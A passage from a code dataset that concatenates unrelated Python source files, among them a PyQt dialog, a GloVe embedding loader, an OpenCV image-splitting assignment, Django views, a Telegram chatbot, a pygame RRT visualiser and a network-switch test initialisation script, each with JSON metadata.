'''将选中的模板发送给主窗口'''\r\n if not self.check_list:\r\n QMessageBox.about(self, \"错误\", \"请选择模板(双击左侧表格选择)\")\r\n return\r\n\r\n model_text = ''\r\n for item in self.check_list:\r\n model_text += item[2]\r\n #如果选择的是模板,且模板数量 > 1 询问是否保存为模板组\r\n if self.radioButton_model.isChecked() and len(self.check_list) > 1:\r\n\r\n reply = QMessageBox.information(self, '信息', '是否保存为新模板组?',\r\n QMessageBox.Yes|QMessageBox.No, QMessageBox.Yes)\r\n\r\n if reply == QMessageBox.Yes:\r\n while True:\r\n model_name, ok = QInputDialog.getText(self, '模板组名称', '输入名称:')\r\n if ok:\r\n if self.model_db.select_from_name(model_name).fetchall():\r\n QMessageBox.about(self, \"错误\", \"名称已存在\")\r\n else:\r\n self.model_db.insert_data([model_name, model_text, 3])\r\n break\r\n else:\r\n return\r\n\r\n #发送信号给主窗口\r\n self.model_add_ok_signal.emit(model_text)\r\n\r\n #清理选择列表\r\n self.listWidget_model_checked.clear()\r\n self.check_list.clear()\r\n\r\n #关闭窗口\r\n self.close()\r\n\r\n","sub_path":"model_select.py","file_name":"model_select.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"304669785","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Dec 24 13:22:27 2017\r\n\r\n@author: shiro\r\n\"\"\"\r\nimport numpy as np\r\n### Prepare embedding vectors ###\r\nimport nltk\r\nfrom nltk.stem import WordNetLemmatizer\r\n\r\ndef load_GloveEmbedding(embedding_dim, dic_word, lemmatisation=False):\r\n files = ['glove.6B.50d.txt', 'glove.6B.100d.txt', 'glove.6B.200d.txt', 'glove.6B.300d.txt']\r\n if embedding_dim == 50:\r\n file = files[0]\r\n elif embedding_dim == 100:\r\n file = files[1]\r\n elif embedding_dim == 200:\r\n file = files[2]\r\n elif embedding_dim ==300:\r\n file = files[3]\r\n else:\r\n return None\r\n \r\n if lemmatisation==True:\r\n lemmatizer = WordNetLemmatizer()\r\n embeddings_index = {}\r\n # load all coeff depending of the words\r\n f = open('glove.6B/'+ file ,'r', encoding='utf8')\r\n for line in f:\r\n values = line.split()\r\n if lemmatisation==True:\r\n word = lemmatizer.lemmatize(values[0])\r\n else:\r\n word = values[0]\r\n coefs = np.asarray(values[1:], dtype='float32')\r\n embeddings_index[word] = coefs\r\n f.close()\r\n \r\n print('Found %s word vectors.' % len(embeddings_index))\r\n \r\n \r\n number_word = max(list(dic_word.values()))\r\n embedding_matrix = np.zeros((number_word + 1, embedding_dim))\r\n ite = 0\r\n for word, i in dic_word.items():\r\n if i != 1:\r\n embedding_vector = embeddings_index.get(word)\r\n if embedding_vector is not None:\r\n # words not found in embedding index will be all-zeros.\r\n embedding_matrix[i] = embedding_vector\r\n ite += 1\r\n print(' %s Nombre de mot trouvé sur %s' % (ite, number_word))\r\n return embedding_matrix\r\n","sub_path":"embedding_word.py","file_name":"embedding_word.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"323052508","text":"class Solution:\r\n def multiply(self, num1, num2):\r\n \"\"\"\r\n :type num1: str\r\n :type num2: str\r\n :rtype: str\r\n \"\"\"\r\n num1_reversed = [int(i) for i in num1][::-1]\r\n num2_reversed = [int(i) for i in num2][::-1]\r\n len1, len2 = len(num1_reversed), len(num2_reversed)\r\n ans = [0 for _ in range(len1 + len2)]\r\n \r\n for idx in range(len1):\r\n for jdx in range(len2):\r\n ans[idx + jdx] += num1_reversed[idx] * num2_reversed[jdx]\r\n\r\n for ldx in range(len(ans) - 1):\r\n ans[ldx + 1] += ans[ldx] // 10\r\n ans[ldx] %= 10\r\n \r\n # for kdx in range(len(ans) - 1, -1, -1):\r\n # while kdx > 0 and ans[kdx] == 0:\r\n # ans = ans[:kdx]\r\n # kdx -= 1\r\n # ans = ans[::-1]\r\n # return ''.join([str(i) for i in ans])\r\n\r\n kdx = len(ans) - 1\r\n while kdx > 0 and ans[kdx] == 0:\r\n ans = ans[:kdx]\r\n kdx -= 1\r\n ans = ans[::-1]\r\n return ''.join([str(i) for i in ans])\r\n \r\ns = Solution()\r\nnum1 = '100'\r\nnum2 = '456'\r\nprint(s.multiply(num1, num2))","sub_path":"leetcode/python/multiplyStrings.py","file_name":"multiplyStrings.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"202879983","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Assignment 1 - Basic image processing\n\n# __Create or find small dataset of images, using an online data source such as Kaggle. At the very least, your dataset should contain no fewer than 10 images.__\n# \n# Find the data in the folder \"cars\". The folder contains 15 images of different lamborghinis.\n# \n# Write a Python script which does the following:\n# \n# - __For each image, find the width, height, and number of channels__\n\n# In[ ]:\n\n\n# Importing libraries\nimport os\nimport sys\nimport numpy as np\n#import pandas as pd\nimport cv2\nfrom pathlib import Path\n\n\n# In[79]:\n\n\n# defining image path\nimage_path = os.path.join(\"..\", \"data\", \"cars\")\n# for loop to find height, width and channels for each .jpg file\nfor filename in Path(image_path).glob(\"*.jpg\"):\n # splitting image path to isolate filename\n file_path, filename = os.path.split(filename) \n path_to_image = os.path.join(file_path, filename)\n # reading in the image\n image = cv2.imread(path_to_image)\n # calculating height, width and channel\n height = image.shape[0]\n width = image.shape[1]\n channel = image.shape[2]\n # printing the width, height and channel for each image\n print(f\"{filename} has a width of {width}, a height of {height} and {channel} channels.\")\n \n\n\n# - __For each image, split image into four equal-sized quadrants (i.e. top-left, top-right, bottom-left, bottom-right)__
\n# Couldn't figure out how to make the images equal-sized.
\n# - __Save each of the split images in JPG format__ \n# \n\n# In[81]:\n\n\n# function for splitting\ndef split_and_save(direction, image, filepath, filename, width, height):\n # calculating half width and height\n split_width = int(width/2)\n split_height = int(height/2)\n # splitting and saving for top left \n if direction == \"top_left\":\n split_top_left = image[0:split_width, 0:split_height]\n outfile_top_left = os.path.join(filepath, \"split_top_left_\" + str(filename))\n cv2.imwrite(outfile_top_left, split_top_left)\n # splitting and saving for top right \n elif direction == \"top_right\":\n split_top_right = image[split_width:width, 0:split_height]\n outfile_top_right = os.path.join(filepath, \"split_top_right_\" + str(filename))\n cv2.imwrite(outfile_top_right, split_top_right)\n # splitting and saving for bottom left \n elif direction == \"bottom_left\":\n split_bottom_left = image[0:split_width, split_height:height]\n outfile_bottom_left = os.path.join(filepath, \"split_bottom_left_\" + str(filename))\n cv2.imwrite(outfile_bottom_left, split_bottom_left)\n # splitting and saving for bottom right \n elif direction == \"bottom_right\":\n split_bottom_right = image[split_width:width, split_height:height]\n outfile_bottom_right = os.path.join(filepath, \"split_bottom_right_\" + str(filename))\n cv2.imwrite(outfile_bottom_right, split_bottom_right)\n # condition for misspellings\n else:\n print(\"Please choose between 'top_left', 'top_right', 'bottom_left' and 'bottom_right'\")\n \n\n\n# In[82]:\n\n\n# for loop for splitting and saving all images\nfor filename in Path(image_path).glob(\"*.jpg\"):\n file_path, filename = os.path.split(filename) \n path_to_image = os.path.join(file_path, filename)\n # defining where to save the split images\n output_path = os.path.join(file_path, \"split_images\")\n # reading image\n image = cv2.imread(path_to_image)\n # Finding height, width and channels\n height, width, channel = image.shape\n # Splitting the image and saving top left \n split_and_save(direction = \"top_left\", \n image = image, \n filepath = output_path, \n filename = filename,\n width = width, \n height = height)\n # Splitting the image and saving top right\n split_and_save(direction = \"top_right\", \n image = image, \n filepath = output_path, \n filename = filename,\n width = width, \n height = height)\n # Splitting the image and saving bottom left\n split_and_save(direction = \"bottom_left\", \n image = image, \n filepath = output_path, \n filename = filename,\n width = width, \n height = height)\n # Splitting the image and saving bottom right\n split_and_save(direction = \"bottom_right\", \n image = image, \n filepath = output_path, \n filename = filename,\n width = width, \n height = height)\n\n\n# - __Create and save a file containing the filename, width, height for all of the new images.__
\n# Couldn't get pandas to work. Tried to install in terminal but without success.\n\n# In[83]:\n\n\n# defining image path\nimage_path = os.path.join(\"..\", \"data\", \"cars\", \"split_images\")\n# for loop to find height, width and channels for each .jpg file\nfor filename in Path(image_path).glob(\"*.jpg\"):\n # splitting image path to isolate filename\n file_path, filename = os.path.split(filename) \n path_to_image = os.path.join(file_path, filename)\n # reading in the image\n image = cv2.imread(path_to_image)\n # calculating height, width and channel\n height = image.shape[0]\n width = image.shape[1]\n channel = image.shape[2]\n # printing the width, height and channel for each image\n print(f\"{filename} has a width of {width}, a height of {height} and {channel} channels.\")\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Assignment_1/notebooks/basic_image_processing.py","file_name":"basic_image_processing.py","file_ext":"py","file_size_in_byte":5598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"207212556","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom first_app.models import *\nfrom first_app import forms\nfrom django.db.models import Avg\n# Create your views here.\n\n\ndef index(request):\n musician_list = Musician.objects.order_by('first_name')\n context = {'title': 'This is Homepage', 'musician_list': musician_list}\n return render(request, 'first_app/index.html', context=context)\n\n\ndef album_list(request, artist_id):\n artist_info = Musician.objects.get(pk=artist_id)\n all_album = Album.objects.filter(artist=artist_id).order_by('name', 'release_date')\n artist_rating = Album.objects.filter(artist=artist_id).aggregate(Avg('rating'))\n context = {'title': 'Album List', 'artist_info': artist_info, 'all_album': all_album, 'artist_rating': artist_rating}\n return render(request, 'first_app/album_list.html', context=context)\n\n\ndef add_musician(request):\n form = forms.MusicianForm()\n if request.method == \"POST\":\n form = forms.MusicianForm(request.POST)\n\n if form.is_valid():\n form.save(commit=True)\n return index(request)\n\n context = {'title': 'Add New Musician', 'musician_form': form, }\n return render(request, 'first_app/musician_form.html', context=context)\n\n\ndef add_album(request):\n form = forms.AlbumForm\n if request.method == \"POST\":\n form = forms.AlbumForm(request.POST)\n\n if form.is_valid():\n form.save(commit=True)\n return index(request)\n\n context = {'title': 'Add New Album', 'album_form': form}\n return render(request, 'first_app/album_form.html', context=context)\n\n\ndef update_artist(request, artist_id):\n artist_info = Musician.objects.get(pk=artist_id)\n form = forms.MusicianForm(instance=artist_info)\n context = {}\n if request.method == 'POST':\n form = forms.MusicianForm(request.POST, instance=artist_info)\n if form.is_valid():\n form.save(commit=True)\n context.update({'success': \"Successfully Updated!\"})\n # return album_list(request, artist_id)\n context.update({'update_form': form})\n return render(request, 'first_app/update_artist.html', context=context)\n\n\ndef update_album(request, album_id):\n album_info = Album.objects.get(pk=album_id)\n form = forms.AlbumForm(instance=album_info)\n context = {}\n if request.method == 'POST':\n form = forms.AlbumForm(request.POST, instance=album_info)\n if form.is_valid():\n form.save(commit=True)\n context.update({'success': \"Successfully Updated!\"})\n # return album_list(request, artist_id)\n context.update({'update_form': form})\n return render(request, 'first_app/update_album.html', context=context)\n\n\ndef delete_album(request, album_id):\n album = Album.objects.get(pk=album_id).delete()\n\n context = {'delete_message': \"Album Deleted Successfully!\"}\n return render(request, 'first_app/delete.html', context=context)\n\n\ndef delete_artist(request, artist_id):\n artist = Musician.objects.get(pk=artist_id).delete()\n\n context = {'delete_message': \"Artist Deleted Successfully!\"}\n return render(request, 'first_app/delete.html', context=context)","sub_path":"first_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"120350921","text":"import graphene\nfrom graphql_jwt.decorators import login_required\nfrom itertools import chain\n\n#Types\nfrom .__types import BaseQuestionType\n\n#Models\nfrom ..models import QuestionMultiple, QuestionOpen, QuestionYesOrNo\n\n\nclass AllQuestions(graphene.ObjectType):\n all_questions = graphene.List(BaseQuestionType)\n \n @login_required\n def resolve_all_questions(self, info, **kwargs):\n\n multi_questions = QuestionMultiple.objects.all()\n yes_no_questions = QuestionYesOrNo.objects.all()\n open_questions = QuestionOpen.objects.all()\n\n all_questions = sorted(\n chain(\n multi_questions, \n yes_no_questions, \n open_questions\n ),key=lambda instance: instance.order)\n\n return all_questions\n\n","sub_path":"app_questions/graphql/allTasks.py","file_name":"allTasks.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"341447909","text":"import sys\nimport simplejson as json\nfrom nycgeo.agent import Agent\n\nconfigpath = \"config/nycgeo.json\"\npgconf = json.loads(open(configpath,\"r\").read())\n\n\nagent = Agent(**pgconf)\nr = agent.fetch_address(\n house_number=\"529\",\n street_name=\"West+29th+St\",\n boro_name=\"Manhattan\"\n )\nprint(\"status = \",r.status_code)\nobj = json.loads(r.content)\nprint(json.dumps(obj,indent=True))\n\n\n","sub_path":"t/test-nycgeo.py","file_name":"test-nycgeo.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"99790290","text":"\"\"\"Test module for the reservation model\"\"\"\n\nimport pytest\n\npytestmark = pytest.mark.django_db\n\n\nclass TestReservationModel:\n \"\"\"Test reservation model\"\"\"\n\n def test_the_model_string_succeeds(self, add_reservations):\n \"\"\"Test that reservation model string rep is correct.\"\"\"\n\n reservation = add_reservations[0]\n assert reservation.__str__(\n ) == f'{reservation.flight} - {reservation.seat_number}'\n\n def test_reservation_creation_succeeds(self, add_reservations):\n \"\"\"\n Test that a reservation model can be successfully created.\n \"\"\"\n reservation = add_reservations[0]\n\n assert reservation.flight is not None\n assert reservation.seat_number is not None\n assert reservation.booked is False\n assert reservation.type is not None\n assert reservation.made_by is not None\n assert reservation.date_made is not None\n\n def test_reservation_deletion_succeeds(self, add_reservations):\n \"\"\"\n Test reservation deletion\n \"\"\"\n\n reservation = add_reservations[0]\n reservation.delete()\n\n assert reservation.deleted\n\n def test_reservation_hard_deletion_succeeds(self, add_reservations):\n \"\"\"\n Test reservation hard deletion\n \"\"\"\n\n reservation = add_reservations[0]\n reservation.hard_delete()\n\n assert reservation.id is None\n","sub_path":"tests/test_booking_app/test_reservation_model.py","file_name":"test_reservation_model.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"572809041","text":"'''\r\nCreated on Nov 3, 2014\r\n\r\n@author: daqing_yi\r\n'''\r\n\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\nimport numpy as np\r\n\r\nclass BiRRTVisualizer(object):\r\n\r\n def __init__(self, rrt):\r\n self.rrt = rrt\r\n pygame.init()\r\n self.screen = pygame.display.set_mode((self.rrt.sampling_width,self.rrt.sampling_height))\r\n pygame.display.set_caption('RRT')\r\n self.screen.fill((255,255,255))\r\n if self.rrt.mapfile != None:\r\n self.mapImg = pygame.image.load(self.rrt.mapfile)\r\n else:\r\n self.mapImg = None\r\n \r\n self.objImg = None\r\n \r\n self.activePaths = []\r\n self.dispMap = True\r\n \r\n self.refLines = []\r\n \r\n self.states = (\"START\", \"GOAL\", \"BOTH\")\r\n self.currentState = 2\r\n \r\n self.font = pygame.font.SysFont(None, 24)\r\n \r\n self.pathIdx = 0\r\n \r\n def loadObj(self, objFile): \r\n self.objImg = pygame.image.load(objFile)\r\n \r\n def update(self):\r\n \r\n for e in pygame.event.get():\r\n if e.type == QUIT or (e.type == KEYUP and e.key == K_ESCAPE):\r\n sys.exit(\"Quit it.\")\r\n if e.type == KEYDOWN:\r\n if e.key == pygame.K_m:\r\n if self.dispMap==True:\r\n self.dispMap = False\r\n else:\r\n self.dispMap = True\r\n elif e.key == pygame.K_LEFT:\r\n self.pathIdx -= 1\r\n elif e.key == pygame.K_RIGHT:\r\n self.pathIdx += 1\r\n \r\n if self.pathIdx >= len(self.activePaths):\r\n self.pathIdx = 0\r\n \r\n self.screen.fill((255,255,255))\r\n if self.dispMap==True:\r\n if self.mapImg != None:\r\n self.screen.blit(self.mapImg,(0,0))\r\n else:\r\n if self.objImg != None:\r\n self.screen.blit(self.objImg,(0,0))\r\n \r\n for refLine in self.refLines:\r\n pygame.draw.line(self.screen, (50,50,50), refLine[0], refLine[1])\r\n \r\n for dr in self.rrt.dividingRefs:\r\n pygame.draw.line(self.screen, (255,204,153), dr[0], dr[1], 10)\r\n \r\n if self.currentState==0 or self.currentState==2: \r\n for n in self.rrt.st_nodes:\r\n for c in n.children:\r\n #print str(n.pos) + \"-\" + str(c.pos)\r\n n_pos = (int(n.pos[0]), int(n.pos[1]))\r\n c_pos = (int(c.pos[0]), int(c.pos[1]))\r\n pygame.draw.line(self.screen, (128,200,0), n_pos, c_pos)\r\n\r\n if self.rrt.st_new_node != None and self.rrt.st_connected_node != None:\r\n new_node = (int(self.rrt.st_new_node[0]), int(self.rrt.st_new_node[1]))\r\n connected_node = (int(self.rrt.st_connected_node[0]), int(self.rrt.st_connected_node[1]))\r\n pygame.draw.line(self.screen, (200,128,0), new_node, connected_node)\r\n \r\n \r\n if self.currentState==1 or self.currentState==2:\r\n for n in self.rrt.gt_nodes:\r\n for c in n.children:\r\n #print str(n.pos) + \"-\" + str(c.pos)\r\n n_pos = (int(n.pos[0]), int(n.pos[1]))\r\n c_pos = (int(c.pos[0]), int(c.pos[1]))\r\n pygame.draw.line(self.screen, (200,128,0), n_pos, c_pos)\r\n\r\n if self.rrt.gt_new_node != None and self.rrt.gt_connected_node != None:\r\n new_node = (int(self.rrt.gt_new_node[0]), int(self.rrt.gt_new_node[1]))\r\n connected_node = (int(self.rrt.gt_connected_node[0]), int(self.rrt.gt_connected_node[1]))\r\n pygame.draw.line(self.screen, (200,128,0), new_node, connected_node)\r\n \r\n if len(self.activePaths) > 0:\r\n activePath = self.activePaths[self.pathIdx]\r\n pathLen = len(activePath)\r\n for i in range(0, pathLen-1, 1):\r\n pos1 = (int(activePath[i][0]), int(activePath[i][1]))\r\n pos2 = (int(activePath[i+1][0]), int(activePath[i+1][1]))\r\n pygame.draw.line(self.screen, (0, 102, 204), pos1, pos2, 2) \r\n \r\n self.screen.blit(self.font.render(\"PI:\"+str(self.pathIdx), True, (255,0,0)), (self.rrt.sampling_width-40, 10))\r\n \r\n start = (int(self.rrt.start[0]), int(self.rrt.start[1]))\r\n goal = (int(self.rrt.goal[0]), int(self.rrt.goal[1]))\r\n pygame.draw.circle(self.screen, (255,0,0), start, 5)\r\n pygame.draw.circle(self.screen, (0,0,255), goal, 5) \r\n \r\n \r\n \r\n pygame.display.flip();\r\n\r\n ","sub_path":"Proj/HomotopyProj/homotopyRRT/BiRRTVisualizer.py","file_name":"BiRRTVisualizer.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"48282700","text":"#!/usr/bin/python3\r\n\r\nimport telebot\r\nfrom telebot.types import Message\r\nimport sqlite3\r\nimport random\r\nimport apiai, json\r\n\r\n\r\nTOKENTG = ''\r\nTOKENAI = ''\r\nbot = telebot.TeleBot(TOKENTG)\r\n\r\n@bot.message_handler(content_types=['sticker'])\r\ndef sticker_handler(message: Message):\r\n ##############\r\n #\r\n ran = random.randint(1, 9)\r\n\r\n conn = sqlite3.connect('dbase.db')\r\n cursor = conn.cursor()\r\n\r\n cursor.execute(f'SELECT STICKER FROM STICKERS WHERE ID={ran}')\r\n\r\n result = str(cursor.fetchall())\r\n\r\n stick = result[3:-4]\r\n ##############\r\n bot.send_sticker(message.chat.id, stick)\r\n\r\n@bot.message_handler(content_types=['text'])\r\n@bot.edited_message_handler(content_types=['text'])\r\ndef send_echo(message):\r\n randm = random.randint(1, 9)\r\n if randm >= 2:\r\n request = apiai.ApiAI(TOKENAI).text_request()\r\n request.lang = 'ru'\r\n request.session_id = 'AndryAI'\r\n request.query = message.text\r\n responseJson = json.loads(request.getresponse().read().decode('utf-8'))\r\n response = responseJson['result']['fulfillment']['speech']\r\n #######################################\r\n if response:\r\n bot.send_message(message.chat.id, response)\r\n else:\r\n bot.send_message(message.chat.id, '))')\r\n\r\n\r\nbot.polling( none_stop = True)\r\n","sub_path":"Andrybot.py","file_name":"Andrybot.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"481572061","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('tagging', '0015_auto_20150406_2127'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='operation',\n options={'ordering': ['date_started']},\n ),\n ]\n","sub_path":"mapping/tagging/migrations/0016_auto_20150408_0637.py","file_name":"0016_auto_20150408_0637.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"259128509","text":"#-*- coding: UTF-8 -*-#\n#*******************************************************************************\n# waffirm_initial.py\n#\n# Author: ()\n#\n# Version 1.0.0\n#\n# Copyright (c) 2004-2008 Digital China Networks Co. Ltd\n#\n# Features: 初始设置\n# 2012-12-4 10:01:57\n#*******************************************************************************\n# Change log:\n# - 2017.2.27 lupingc RDM46364 获取ap1 dhcp option60版本号\n# - 2017.6.1 lupingc ac1配置登录用户名和密码\n# - 2017.10.27 zhangjxp RDM50238\n# - 2017.11.10 zhangjxp RDM50321\n#*******************************************************************************\nimport os\nimport time\nimport re\nimport wx\n\ndef reloadallsut(**kargs):\n '''\n 功能:使用多线程重启所有设备\n 参数:AP或SWITCH类型的设备,参数格式:AP=[ap1,ap2],SWITCH=[switch1,switch2,switch3]\n 返回:None\n 举例:reloadallsut(AP=[ap1,ap2],SWITCH=[switch1,switch2,switch3]) \n 备注:此函数基本只在初始化过程中使用,其他用例中用到的概率极少\n '''\n threadslist = []\n for type in list(kargs.keys()):\n if type=='AP':\n for ap in kargs[type]:\n # Apcmdtype = Ap1cmdtype if ap == 'ap1' else Ap2cmdtype\n Apcmdtype = Ap1cmdtype\n t = CallThread(RebootAp,'AP',150,0,'admin','admin',True,AP=ap,apcmdtype=Apcmdtype)\n threadslist.append(t)\n if type=='SWITCH':\n for switch in kargs[type]:\n t = CallThread(ReloadMultiSwitch,[switch])\n threadslist.append(t)\n for t in threadslist:\n t.start()\n for t in threadslist:\n t.join()\n\n#记录日志\nprintInitialTimer('TestCase Initial','Start')\n\n#各设备恢复出厂设置\nif set_default == 1:#this defined in topo file\n print('setting default')\n SetDefault(switch1)\n SetDefault(switch3)\n Receiver(switch1,'write',timeout=1)\n Receiver(switch3,'write',timeout=1)\n IdleAfter(1)\n Receiver(switch1,'y',timeout=2)\n Receiver(switch3,'y',timeout=2)\n #使用多线程对各设备同时进行重启操作\n reloadallsut(AP=ap_name_list,SWITCH=[switch1,switch3])\n\nSetTerminalLength(switch1)\nSetWatchdogDisable(switch1)\nSetExecTimeout(switch1)\nSetTerminalLength(switch3)\nSetWatchdogDisable(switch3)\nSetExecTimeout(switch3)\n\nprintRes('Check the software version of s1...')\nShowVersion(switch1)\n\nSetCmd(pc1,'cd /root')\nSetCmd(pc1,'service dhcpd stop')\nSetCmd(sta1,'cd /root')\nSetCmd(sta1,'service dhcpd stop')\nSetCmd(sta2,'cd /root')\nSetCmd(sta2,'service dhcpd stop')\n\nprint('initialing ')\n#交换机初始配置\n#--------------------------- 初始化AC1 ---------------------------------------\nEnterInterfaceMode(switch1,'loopback 1')\nSetCmd(switch1,'ip address',StaticIpv4_ac1,'255.255.255.255')\nSetCmd(switch1,'ipv6 address',StaticIpv6_ac1+'/128')\nEnterConfigMode(switch1)\nSetCmd(switch1,'vlan '+Vlan1)\nEnterInterfaceMode(switch1,s1p1)\nSetCmd(switch1,'switchport access vlan '+Vlan1)\nEnterInterfaceMode(switch1,'vlan '+Vlan1)\nIdleAfter(Vlan_Idle_time)\nSetCmd(switch1,'no ip address')\nSetCmd(switch1,'ip address',If_vlan1_s1_ipv4,'255.255.255.192')\n#配置wireless视图下的参数\nEnterWirelessMode(switch1)\nSetCmd(switch1,'keep-alive-interval 10000')\nSetCmd(switch1,'keep-alive-max-count 3')\nSetCmd(switch1,'country-code cn')\nSetCmd(switch1,'channel enhance disable')\nSetCmd(switch1,'enable')\nSetCmd(switch1,'static-ip',StaticIpv4_ac1)\nSetCmd(switch1,'static-ipv6',StaticIpv6_ac1)\nEnterWirelessMode(switch1)\nSetCmd(switch1,'no auto-ip-assign')\nSetCmd(switch1,'no discovery vlan-list',1)\nSetCmd(switch1,'discovery vlan-list',Vlan1)\n#配置Network1\nEnterNetworkMode(switch1,1)\nSetCmd(switch1,'ssid ' + Network_name1)\nSetCmd(switch1,'vlan ' + Vlan4091) \n\nfor i in range(total_apnum):\n #配置Ap-profile1\n EnterApProMode(switch1,i+1)\n SetCmd(switch1,'hwtype',ap_hwtype_list[i])\n SetCmd(switch1,'radio '+radio1num)\n SetCmd(switch1,'rf-scan other-channels interval 5')\n SetCmd(switch1,'rf-scan duration 50')\n SetCmd(switch1,'vap 1')\n SetCmd(switch1,'enable')\n SetCmd(switch1,'exit')\n SetCmd(switch1,'exit')\n SetCmd(switch1,'radio '+radio2num)\n SetCmd(switch1,'mode ac')\n SetCmd(switch1,'vap 1')\n SetCmd(switch1,'enable')\n EnterWirelessMode(switch1)\n SetCmd(switch1,'ap database',ap_mac_list[i])\n SetCmd(switch1,'profile',i+1)\n #配置Discovery ip-list\n # EnterWirelessMode(switch1)\n # SetCmd(switch1,'discovery ip-list',ap_ipv4_list[i]) \n\nEnterConfigMode(switch1)\nSetCmd(switch1,'username '+Ssh_login_name+' privilege 15 password 0 '+Ssh_login_password)\nSetCmd(switch1,'router rip')\nSetCmd(switch1,'network 0.0.0.0/0')\n\n# 集中转发、本地转发差异化配置,如测试集中转发,AC1需进行如下配置\nif testcentral == True:\n print('s1 initial centralizedforwarding')\n EnterConfigMode(switch1)\n # SetCmd(switch1,'no interface vlan 1')\n SetCmd(switch1,'vlan',Vlan4091 + '-' + Vlan4093)\n EnterInterfaceMode(switch1,'vlan '+Vlan4091)\n IdleAfter(Vlan_Idle_time)\n SetCmd(switch1,'ip address',If_vlan4091_s1_ipv4,'255.255.255.0')\n SetCmd(switch1,'ipv6 address',If_vlan4091_s1_ipv6+'/64')\n EnterInterfaceMode(switch1,'vlan '+Vlan4092)\n IdleAfter(Vlan_Idle_time)\n SetCmd(switch1,'ip address',If_vlan4092_s1_ipv4,'255.255.255.0')\n #开启DHCP\n EnterConfigMode(switch1)\n SetCmd(switch1,'service dhcp')\n SetCmd(switch1,'ip dhcp excluded-address ' + If_vlan4091_s1_ipv4)\n SetCmd(switch1,'ip dhcp excluded-address ' + If_vlan4091_s2_ipv4)\n SetCmd(switch1,'ip dhcp excluded-address ' + If_vlan4092_s1_ipv4)\n SetCmd(switch1,'ip dhcp excluded-address ' + If_vlan4092_s2_ipv4)\n SetCmd(switch1,'ip dhcp pool pool4091')\n SetCmd(switch1,'network-address ' + Dhcp_pool1 + '0 255.255.255.0')\n SetCmd(switch1,'default-router ' + If_vlan4091_s1_ipv4)\n SetCmd(switch1,'exit')\n SetCmd(switch1,'ip dhcp pool pool4092')\n SetCmd(switch1,'network-address ' + Dhcp_pool2 + '0 255.255.255.0')\n SetCmd(switch1,'default-router ' + If_vlan4092_s1_ipv4)\n SetCmd(switch1,'exit')\n # 配置wireless模式,开启集中转发\n EnterWirelessMode(switch1)\n SetCmd(switch1,'l2tunnel vlan-list add',Vlan4091 + '-' + Vlan4093)\n \n\n\n# # #--------------------------- 初始化AP ---------------------------------------\n# for i in range(total_apnum):\n # SetCmd(ap_name_list[i],'\\n')\n # ApSetcmd(ap_name_list[i],ap_cmdtype_list[i],'set_static_ip',ap_ipv4_list[i])\n # ApSetcmd(ap_name_list[i],ap_cmdtype_list[i],'set_dhcp_down')\n # ApSetcmd(ap_name_list[i],ap_cmdtype_list[i],'set_dhcpv6_down')\n # ApSetcmd(ap_name_list[i],ap_cmdtype_list[i],'set_ip_route',If_vlan1_s3_ipv4)\n # ApSetcmd(ap_name_list[i],ap_cmdtype_list[i],'saverunning') \n#--------------------------- 初始化 S3 ---------------------------------------\n\n#vlan1\nEnterConfigMode(switch3)\nSetCmd(switch3,'vlan '+Vlan1)\nSetCmd(switch3,'switchport interface',s3p1)\n# SetCmd(switch3,'switchport interface',s3p3)\nSetCmd(switch3,'switchport interface',s3p6)\nEnterInterfaceMode(switch3,'vlan '+Vlan1)\nIdleAfter(Vlan_Idle_time)\nSetIpAddress(switch3,If_vlan1_s3_ipv4,'255.255.255.192')\n\n#vlan192\nEnterConfigMode(switch3)\nSetCmd(switch3,'vlan',Vlan192)\nSetCmd(switch3,'switchport interface',s3p5)\nEnterInterfaceMode(switch3,'vlan '+Vlan192)\nIdleAfter(Vlan_Idle_time)\nSetIpAddress(switch3,If_vlan192_s3_ipv4,'255.255.255.0')\n\n#router rip\nEnterConfigMode(switch3)\nSetCmd(switch3,'router rip')\nSetCmd(switch3,'network 0.0.0.0/0')\nEnterEnableMode(switch3)\n\nEnterConfigMode(switch3)\nSetCmd(switch3,'vlan '+Vlan1)\nfor i in range(total_apnum):\n SetCmd(switch3,'switchport interface',ap_s3port_list[i])\n# 集中转发、本地转发差异化配置,如测试本地转发,S3需进行如下配置\nif testcentral == False:\n print('s3 initial localforwarding')\n EnterConfigMode(switch3)\n # SetCmd(switch3,'no interface vlan 1')\n SetCmd(switch3,'vlan',Vlan4091 + '-' + Vlan4093)\n EnterInterfaceMode(switch3,'vlan '+Vlan4091)\n IdleAfter(Vlan_Idle_time)\n SetCmd(switch3,'ip address',If_vlan4091_s1_ipv4,'255.255.255.0')\n SetCmd(switch3,'ipv6 